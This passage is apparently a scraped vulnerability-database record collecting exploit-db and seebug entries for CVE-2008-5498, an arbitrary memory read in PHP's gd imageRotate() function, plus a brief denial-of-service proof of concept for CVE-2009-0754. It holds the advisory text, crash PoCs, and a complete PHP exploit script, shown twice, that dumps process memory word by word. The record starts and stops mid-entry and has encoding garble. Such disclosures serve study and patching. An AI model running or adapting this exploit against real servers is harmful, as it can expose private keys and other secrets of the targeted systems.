Ebadi, \nFurther research and exploit: Mohammad R. Roohian\nCSIRT Team Members\nAmirkabir University APA Laboratory\n\nIntroduction\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\n\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\n\nVulnerableversion\nPHP <= 5.2.8\nCVE Candidate Number: CVE-2008-5498\n\nVulnerability\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\nA correct validation check for the indexed images could be:\n\nfile: php-x.y.z/ext/gd/libgd/gd.c\n\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\n int clrBack, int ignoretransparent) \n3130:{ \n3131: gdImagePtrpMidImg; \n3132: gdImagePtrrotatedImg;\n3133:\n3134: if(src == NULL) { \n3135: returnNULL; \n3136: }\n3137:+\n3137:+ // Index check\n3137:+ if (!src->truecolor) \n3137:+ clrBack &= 0xff; // Just keep the first byte\n3137:+\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \n3139: returnNULL; \n3140: }\n\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\ntypedef struct gdImageStruct { \n \n --snip snip -- \n \n intred[gdMaxColors]; \n intgreen[gdMaxColors]; \n intblue[gdMaxColors]; \n \n --snip snip -- \n \n intalpha[gdMaxColors]; \n /*Truecolor flag and pixels. New 2.0 fields appear here at the \n endto minimize breakage of existing object code. */ \n inttrueColor; \n \n --snip snip -- \n \n} gdImage; \n\ntypedef gdImage * gdImagePtr; \n\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \n\nfile: php-x.y.z/ext/gd/libgd/gd.h\n\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\n ((r)<< 16) + \\\n ((g)<< 8) + \\\n (b))\n\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\n\nProof of concept:\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\n\n<?php\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,-9999999);\n\n?>\nExploitation :\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\n\n<?php \n&special_index = /* index of the$address */\n$r=imagecreate(300,300); \n$gray = imagecolorallocate( $r,111,111,111); \nimagefilledrectangle($r,0,0,300,300,$gray);\n$tmp =imagerotate( $r, 30,&special_index ); \nimagePng( $tmp, \"test.png\" ); \n?>\n\n\n --------\n|f_b/\\\t |\n| / \\\t |\n| / \\ |\n|/image\t\\|\n|\\ /|\n| \\ / |\n| \\ /\t |\n| \\/\t |\n --------\n\nTo read encoded memory values from a desired address, we have to use the following script:\n\n<?php\n\n$address = /*address to read should bemultiply of 4 */\n$src = 0x84cde2c; \n// depends on the image size and phpscript length but is constant\n$index_b = -(int)(($src - $address +0x810)/4);\n\n$img = imagecreate(5,5);\n$tmp = imagerotate ($img,5,$index_b);\n$f_b = imagecolorat( $tmp,0,0);\n\n?>\n\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\nThe color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following:\n$f_b = gdTrueColorAlpha( M[$address-512],\n M[$address-255],\n M[$address+0],\n M[$address+1034]);\n\nThese offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays.\nDecoding $f_b\nAs you can see in the source code $f_b is calculated like this:\n----------------------------------------------------------\na\t:A4\tA3\tA2\tA1\nr\t:\tR4\tR3\tR2\tR1\ng\t:\t\tG4\tG3\tG2\tG1\nb\t:\t\t\tB4\tB3\tB2\tB1\n----------------------------------------------------------\n$f_b\t:\t\t\tF4\tF3\tF2\tF1\n----------------------------------------------------------\n\nWe have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 \u0102\u0082\u00e2\u0080\u0093 G1. \nTo calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code.\n\n\n\nExploit: \n<?php \n/* \nedi = src \nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS) sample: 0x01 00 SM 00 ) \n\n( \n\tzend_bool magic_quotes_sybase;\t\t\tMQS \n\tzend_bool safe_mode;\t\t\t\tSM \n\tzend_bool allow_call_time_pass_reference;\t\tAPR \n\tzend_bool implicit_flush;\t\t\t\tIF \n) \n\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \nmov ebx, [edi+esi*4+10] \n\ntest case: \nedi = 0x084c6128 \nesi = 0xffee07b1(-1177679) values less than this will crash. \n=> \nebx = 0x8047ff6 \n\nif (a>127) { \n\ta = 127; \n} \n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \n*/ \n$debug = 0; \n$address = hexdec($argv[1]); \n$addressSave = $address; \n$count = $argv[3]+1; \n$mode = $argv[2]; \n$src = 0x84cde2c; \n$s = 10; //image size \n\n$GLOBALS[\"image\"]=imagecreate($s,$s); \n$r = $GLOBALS[\"image\"]; \nif( $debug ) \n\techo \"Image created.\\n\"; \n\nfunction getDataFromImage( $index ) { \n\t$tmp = imagerotate ($GLOBALS[\"image\"],5,$index); \n\treturn imagecolorat( $tmp, 0,0); \n} \n\n$eor = 0; \nwhile( $address < $addressSave+$count*4 ) { \n\t// indexes \n\t$index_b = (int)(($src - $address + 0x810)/4); \n\t$index_g = $index_b + 256; \n\t$index_r = $index_b + 512; \n\t$index_a = $index_b - 1034; \n\t//$index_gG is the same as index of r \n\t$index_gR = $index_g + 512; \n\t//$index_rG is the same as index of gR \n\t//$index_gGg is the same as index of gR \n\n\t// fuctions \n\t$f_b = getDataFromImage( -$index_b ); \n\t$f_g = getDataFromImage( -$index_g ); \n\t$f_r = getDataFromImage( -$index_r ); \n\t$f_a = getDataFromImage( -$index_a ); \n\t$f_gR = getDataFromImage( -$index_gR ); \n\n\t/********************* Byte 1 **********************/ \n\n\t// b byte 1 \n\t$byte_b1 = $f_b & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:1-0x%x\\n\", $byte_b1 ); \n\n\t//g byte 1 \n\t$byte_g1 = $f_g & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:1-0x%x\\n\", $byte_g1 ); \n\n\t//r byte 1 \n\t$byte_r1 = $f_r& 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:1-0x%x\\n\", $byte_r1 ); \n\n\t//a byte 1 \n\t$byte_a1 = $f_a & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"a:1-0x%x\\n\\n\", $byte_a1 ); \n \n\t/* Relative */ \n\n\t// gG byte 1 \n\t// this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \n\t$byte_gG1 = $byte_r1; \n\n\t// gR byte 1 \n\t// this is relative r to `g`( suppose that 'g' is a b) \n\t$byte_gR1 = $f_gR & 0x000000ff; \n\n\t// rG byte 1 \n\t// this is relative g to r( suppose that 'r' is a b) \n\t$byte_rG1 = $byte_gR1; \n\n\t/* 2 Level Relative */ \n\n\t// gGg byte 1 \n\t// this is relative g to `gG`( suppose that 'gG' is a b) \n\t$byte_gGg1 = $byte_gR1; \n\n\t/********************* Byte 2 **********************/ \n\n\t// b byte 2 \n\t$sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \n\t$byte_b2 = $sum_b2_g1 - $byte_g1; \n\t$borrow_b2 = 0; \n\tif( $byte_b2 < 0 ) \n\t\t$borrow_b2 = 1; \n\t$byte_b2 = $byte_b2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:2-0x%x \\t0x%x\\n\", $byte_b2, $f_b ); \n\n\t// g byte 2 \n\t$sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \n\t$byte_g2 = $sum_g2_gG1 - $byte_gG1; \n\t$borrow_g2 = 0; \n\tif( $byte_g2 < 0 ) \n\t\t$borrow_g2 = 1; \n\t$byte_g2 = $byte_g2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"g:2-0x%x \\t0x%x\\n\", $byte_g2, $f_gG1 ); \n\n\t// r byte 2 \n\t$sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \n\t$byte_r2 = $sum_r2_rG1 - $byte_rG1; \n\t$byte_r2 = $byte_r2 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"r:2-0x%x \\t0x%x\\n\\n\", $byte_r2, $sum_r2_rG1 ); \n\n\t/* Relative */ \n\n\t// gG byte 2 \n\t$byte_gG2 = $byte_r2; \n\n\t/********************* Byte 3 **********************/ \n\n\t// b byte 3 \n\t$sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \n\t$sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \n\t$sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \n\t$byte_b3 = $sum_b3_g2 - $byte_g2; \n\t$borrow_b3 = 0; \n\tif( $byte_b3 < 0 ) \n\t{ \n\t\t$borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one \n\t\tif( $debug ) \n\t\t\tprintf( \"\\nborrow was: %d\\n\" , $borrow_b3 ); \n\t} \n\t$byte_b3 = $byte_b3 & 0x000000ff; \n\tif( $debug ) \n\t\tprintf( \"b:3-0x%x \\t0x%x\\n\", $byte_b3, $sum_b3_g2 ); \n\n\t// g byte 3 \n\t$sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \n\t$sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \n\t$sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \n\t$byte_g3 = $sum_g3_gG2 - $byte_gG2; \n\t$byte_g3 = $byte_g3 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_g: 0x%x\\n\" , $f_g); \n\t\tprintf( \"sum_g3_gG2_gR1_br2: 0x%x\\n\" , $sum_g3_gG2_gR1_br2 ); \n\t\tprintf( \"sum_g3_gG2_gR1: 0x%x\\n\" , $sum_g3_gG2_gR1 ); \n\t\tprintf( \"sum_g3_gG2: 0x%x\\n\" , $sum_g3_gG2 ); \n\t\tprintf( \"g:3-0x%x \\t0x%x\\n\\n\", $byte_g3, $sum_b3_g2 ); \n\t} \n\n\t/********************* Byte 4 **********************/ \n\n\t// b byte 4 \n\t$sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \n\t$sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \n\t$sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \n\t$sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \n\t$byte_b4 = $sum_b4_g3 - $byte_g3; \n\t$byte_b4 = $byte_b4 & 0x000000ff; \n\tif( $debug ) { \n\t\tprintf( \"f_b: 0x%x\\n\" , $f_b); \n\t\tprintf( \"sum_b4_g3_r2_a1_br3: 0x%x\\n\" , $sum_b4_g3_r2_a1_br3 ); \n\t\tprintf( \"sum_b4_g3_r2_a1: 0x%x\\n\" , $sum_b4_g3_r2_a1 ); \n\t\tprintf( \"sum_b4_g3_r2: 0x%x\\n\" , $sum_b4_g3_r2 ); \n\t\tprintf( \"sum_b4_g3: 0x%x\\n\" , $sum_b4_g3 ); \n\t\tprintf( \"b:4-0x%x\\n\\n\", $byte_b4); \n\t} \n\t/********************* Byte **********************/ \n\n\tif($mode == 0) { //text mode \n\t\tprintf( \"%c%c%c%c\", $byte_b1, $byte_b2, $byte_b3, $byte_b4); \n\t} elseif( $mode == 1) { \n\t\t// b \n\t\tif( !$eor ) \n\t\t\tprintf( \"0x%x:\\t\", $address ); \n\t\tprintf( \"0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t\", $byte_b1, $byte_b1, \n\t\t\t\t\t\t\t\t\t\t $byte_b2, $byte_b2, \n\t\t\t\t\t\t\t\t\t\t $byte_b3, $byte_b3, \n\t\t\t\t\t\t\t\t\t\t $byte_b4, $byte_b4 ); \n\n\t\t$eor = !$eor; \n\t\tif( !$eor ) \n\t\t\techo \"\\n\"; \n\t} else { \n\t\t$val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; \n\t\tprintf( \"0x%x: 0x%x\\n\", $address, $val ); \n\t} \n\t$address+=4; \n} \n?> \n \nCredit\nThis vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory.\nautcert@aut.ac.ir\nhttps://www.ircert.cc\n\nDisclosure: October 2008\nReport to vendor: December, 10, 2008\n\n# milw0rm.com [2009-01-02]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7646/"}, {"lastseen": "2016-02-03T17:45:47", "description": "PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability. CVE-2009-0754. Dos exploit for php platform", "published": "2009-01-30T00:00:00", "type": "exploitdb", "title": "PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0754"], "modified": "2009-01-30T00:00:00", "id": "EDB-ID:32769", "href": "https://www.exploit-db.com/exploits/32769/", "sourceData": "source: http://www.securityfocus.com/bid/33542/info\r\n\r\nPHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations.\r\n\r\nAttackers can exploit this issue to crash the affected webserver, denying service to legitimate users. \r\n\r\n<?php\r\n $v = '\u00d2\u00ee\u00e2\u00e0 \u00e5 \u00f2\u00e5\u00f1\u00f2|test.php';\r\n print substr($v,0,strpos($v,'|'));\r\n?>", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/32769/"}], "seebug": [{"lastseen": "2017-11-19T19:03:04", "description": "BUGTRAQ ID: 33002\r\nCVE(CAN) ID: CVE-2008-5498\r\n\r\nPHP\u662f\u5e7f\u6cdb\u4f7f\u7528\u7684\u901a\u7528\u76ee\u7684\u811a\u672c\u8bed\u8a00\uff0c\u7279\u522b\u9002\u5408\u4e8eWeb\u5f00\u53d1\uff0c\u53ef\u5d4c\u5165\u5230HTML\u4e2d\u3002\r\n\r\nPHP\u7684imageRotate\u51fd\u6570\u4e2d\u5b58\u5728\u6570\u7ec4\u7d22\u5f15\u9519\u8bef\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u5411\u7d22\u5f15\u7684\u56fe\u7247\u63d0\u4ea4\u7279\u5236\u7684bgd_color\u6216clrBack \u53c2\u6570\u503c\u8bfb\u53d6\u4efb\u610f\u5185\u5b58\u4f4d\u7f6e\u7684\u5185\u5bb9\u3002\r\n\n\nPHP 5.2.8\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPHP\r\n---\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n<a href=http://www.php.net target=_blank rel=external nofollow>http://www.php.net</a>", "published": "2008-12-30T00:00:00", "type": "seebug", "title": "PHP imageRotate()\u672a\u521d\u59cb\u5316\u5185\u5b58\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5498"], "modified": "2008-12-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4604", "id": "SSV:4604", "sourceData": "\n <?php \r\n/* \r\nedi = src \r\nesi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS)\r\nsample: 0x01 00 SM 00 ) \r\n\r\n( \r\n zend_bool\r\nmagic_quotes_sybase; MQS \r\n zend_bool safe_mode; SM \r\n zend_bool allow_call_time_pass_reference; APR \r\n zend_bool\r\nimplicit_flush; IF \r\n) \r\n\r\n0x080ed27f <php_gd_gdImageSkewX+1135>: mov 0x10(%edi,%esi,4),%ebx \r\nmov ebx, [edi+esi*4+10] \r\n\r\ntest case: \r\nedi = 0x084c6128 \r\nesi = 0xffee07b1(-1177679) values less than this will crash. \r\n=> \r\nebx = 0x8047ff6 \r\n\r\nif (a>127) { \r\n a = 127; \r\n} \r\n:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. \r\n*/ \r\n$debug = 0; \r\n$address = hexdec($argv[1]); \r\n$addressSave = $address; \r\n$count = $argv[3]+1; \r\n$mode = $argv[2]; \r\n$src = 0x84cde2c; \r\n$s = 10; //image size \r\n\r\n$GLOBALS["image"]=imagecreate($s,$s); \r\n$r = $GLOBALS["image"]; \r\nif( $debug ) \r\n echo "Image created.\\n"; \r\n\r\n\r\nfunction getDataFromImage( $index ) { \r\n $tmp = imagerotate ($GLOBALS["image"],5,$index); \r\n return imagecolorat( $tmp, 0,0); \r\n} \r\n\r\n$eor = 0; \r\nwhile( $address < $addressSave+$count*4 ) { \r\n // indexes \r\n $index_b = (int)(($src - $address + 0x810)/4); \r\n $index_g = $index_b + 256; \r\n $index_r = $index_b + 512; \r\n $index_a = $index_b - 1034; \r\n //$index_gG is the same as index of r \r\n $index_gR = $index_g + 512; \r\n //$index_rG is the same as index of gR \r\n //$index_gGg is the same as index of gR \r\n\r\n // fuctions \r\n $f_b = getDataFromImage( -$index_b ); \r\n $f_g = getDataFromImage( -$index_g ); \r\n $f_r = getDataFromImage( -$index_r ); \r\n $f_a = getDataFromImage( -$index_a ); \r\n $f_gR = getDataFromImage( -$index_gR ); \r\n/\r\n /********************* Byte 1 **********************/ \r\n\r\n // b byte 1 \r\n $byte_b1 = $f_b & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:1-0x%x\\n", $byte_b1 ); \r\n\r\n //g byte 1 \r\n $byte_g1 = $f_g & 0x000000ff; \r\n if( $debug ) \r\n printf( "g:1-0x%x\\n", $byte_g1 ); \r\n\r\n //r byte 1 \r\n $byte_r1 = $f_r& 0x000000ff; \r\n if( $debug ) \r\n printf( "r:1-0x%x\\n", $byte_r1 ); \r\n\r\n //a byte 1 \r\n $byte_a1 = $f_a & 0x000000ff; \r\n if( $debug ) \r\n printf( "a:1-0x%x\\n\\n", $byte_a1 ); \r\n\r\n /* Relative */ \r\n\r\n // gG byte 1 \r\n // this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. \r\n $byte_gG1 = $byte_r1; \r\n\r\n // gR byte 1 \r\n // this is relative r to `g`( suppose that 'g' is a b) \r\n $byte_gR1 = $f_gR & 0x000000ff; \r\n\r\n // rG byte 1 \r\n // this is relative g to r( suppose that 'r' is a b) \r\n $byte_rG1 = $byte_gR1; \r\n\r\n /* 2 Level Relative */ \r\n\r\n // gGg byte 1 \r\n // this is relative g to `gG`( suppose that 'gG' is a b) \r\n $byte_gGg1 = $byte_gR1; \r\n\r\n /********************* Byte 2 **********************/ \r\n\r\n // b byte 2 \r\n $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); \r\n $byte_b2 = $sum_b2_g1 - $byte_g1; \r\n $borrow_b2 = 0; \r\n if( $byte_b2 < 0 ) \r\n $borrow_b2 = 1; \r\n $byte_b2 = $byte_b2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:2-0x%x \\t0x%x\\n", $byte_b2, $f_b ); \r\n\r\n // g byte 2 \r\n\r\n $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); \r\n $byte_g2 = $sum_g2_gG1 - $byte_gG1; \r\n $borrow_g2 = 0; \r\n if( $byte_g2 < 0 ) \r\n $borrow_g2 = 1; \r\n $byte_g2 = $byte_g2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "g:2-0x%x \\t0x%x\\n", $byte_g2, $f_gG1 ); \r\n\r\n // r byte 2 \r\n $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); \r\n $byte_r2 = $sum_r2_rG1 - $byte_rG1; \r\n $byte_r2 = $byte_r2 & 0x000000ff; \r\n if( $debug ) \r\n printf( "r:2-0x%x \\t0x%x\\n\\n", $byte_r2 ,$sum_r2_rG1 ); \r\n\r\n /* Relative */ \r\n\r\n // gG byte 2 \r\n $byte_gG2 = $byte_r2; \r\n\r\n /********************* Byte 3 **********************/ \r\n\r\n // b byte 3 \r\n $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); \r\n $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; \r\n $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; \r\n $byte_b3 = $sum_b3_g2 - $byte_g2; \r\n $borrow_b3 = 0; \r\n if( $byte_b3 < 0 ) \r\n { \r\n $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; //for borrows more than one \r\n if( $debug ) \r\n printf( "\\nborrow was: %d\\n" $borrow_b3 ); \r\n } \r\n $byte_b3 = $byte_b3 & 0x000000ff; \r\n if( $debug ) \r\n printf( "b:3-0x%x \\t0x%x\\n", $byte_b3,$sum_b3_g2 ); \r\n\r\n // g byte 3 \r\n $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); \r\n $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; \r\n $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; \r\n $byte_g3 = $sum_g3_gG2 - $byte_gG2; \r\n $byte_g3 = $byte_g3 & 0x000000ff; \r\n if( $debug ) { \r\n printf( "f_g: 0x%x\\n" , $f_g); \r\n printf( "sum_g3_gG2_gR1_br2: 0x%x\\n" , $sum_g3_gG2_gR1_br2 ); \r\n\r\n printf( "sum_g3_gG2_gR1: 0x%x\\n" ,$sum_g3_gG2_gR1 ); \r\n printf( "sum_g3_gG2: 0x%x\\n" , $sum_g3_gG2 ); \r\n printf( "g:3-0x%x \\t0x%x\\n\\n", $byte_g3,$sum_b3_g2 ); \r\n } \r\n\r\n /********************* Byte 4 **********************/ \r\n\r\n // b byte 4 \r\n $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); \r\n $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; \r\n $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; \r\n $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; \r\n $byte_b4 = $sum_b4_g3 - $byte_g3; \r\n $byte_b4 = $byte_b4 & 0x000000ff; \r\n if( $debug ) { \r\n printf( "f_b: 0x%x\\n" , $f_b); \r\n printf( "sum_b4_g3_r2_a1_br3: 0x%x\\n" ,$sum_b4_g3_r2_a1_br3 ); \r\n printf( "sum_b4_g3_r2_a1: 0x%x\\n" ,$sum_b4_g3_r2_a1 ); \r\n printf( "sum_b4_g3_r2: 0x%x\\n" , $sum_b4_g3_r2 ); \r\n printf( "sum_b4_g3: 0x%x\\n" , $sum_b4_g3 ); \r\n printf( "b:4-0x%x\\n\\n", $byte_b4); \r\n } \r\n /********************* Byte **********************/ \r\n\r\n if($mode == 0) { //text mode \r\n printf( "%c%c%c%c", $byte_b1, $byte_b2,$byte_b3, $byte_b4); \r\n } elseif( $mode == 1) { \r\n // b \r\n if( !$eor ) \r\n printf( "0x%x:\\t", $address ); \r\n printf("0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t0x%x(%c)\\t", $byte_b1, $byte_b1, \r\n \r\n $byte_b2, $byte_b2, \r\n \r\n $byte_b3, $byte_b3, \r\n \r\n $byte_b4, $byte_b4 ); \r\n\r\n $eor = !$eor; \r\n if( !$eor ) \r\n echo "\\n"; \r\n } else { \r\n $val = ($byte_b4 << 24) + ($byte_b3 << 16) +($byte_b2 << 8) + $byte_b1; \r\n printf( "0x%x: 0x%x\\n", $address, $val ); \r\n } \r\n $address+=4; \r\n} \r\n?> \r\n\r\n\r\n<?php\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n?>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4604", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T21:19:35", "description": "No description provided by source.", "published": "2009-01-03T00:00:00", "title": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5498"], "modified": "2009-01-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-10377", "id": "SSV:10377", "sourceData": "\n PHP - gd library - imageRotate()function Information Leak Vulnerability\r\n\r\nDiscovered by: Hamid Ebadi, \r\nFurther research and exploit: Mohammad R. Roohian\r\nCSIRT Team Members\r\nAmirkabir University APA Laboratory\r\n\r\nIntroduction\r\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\r\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\r\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \r\nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\r\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\r\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\r\n\r\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\r\n\r\nVulnerableversion\r\nPHP <= 5.2.8\r\nCVE Candidate Number: CVE-2008-5498\r\n\r\nVulnerability\r\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\r\nA correct validation check for the indexed images could be:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.c\r\n\r\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\r\n int clrBack, int ignoretransparent) \r\n3130:{ \r\n3131: gdImagePtrpMidImg; \r\n3132: gdImagePtrrotatedImg;\r\n3133:\r\n3134: if(src == NULL) { \r\n3135: returnNULL; \r\n3136: }\r\n3137:+\r\n3137:+ // Index check\r\n3137:+ if (!src->truecolor) \r\n3137:+ clrBack &= 0xff; // Just keep the first byte\r\n3137:+\r\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \r\n3139: returnNULL; \r\n3140: }\r\n\r\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\r\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\ntypedef struct gdImageStruct { \r\n \r\n --snip snip -- \r\n \r\n intred[gdMaxColors]; \r\n intgreen[gdMaxColors]; \r\n intblue[gdMaxColors]; \r\n \r\n --snip snip -- \r\n \r\n intalpha[gdMaxColors]; \r\n /*Truecolor flag and pixels. New 2.0 fields appear here at the \r\n endto minimize breakage of existing object code. */ \r\n inttrueColor; \r\n \r\n --snip snip -- \r\n \r\n} gdImage; \r\n\r\ntypedef gdImage * gdImagePtr; \r\n\r\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\r\n ((r)<< 16) + \\\r\n ((g)<< 8) + \\\r\n (b))\r\n\r\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory 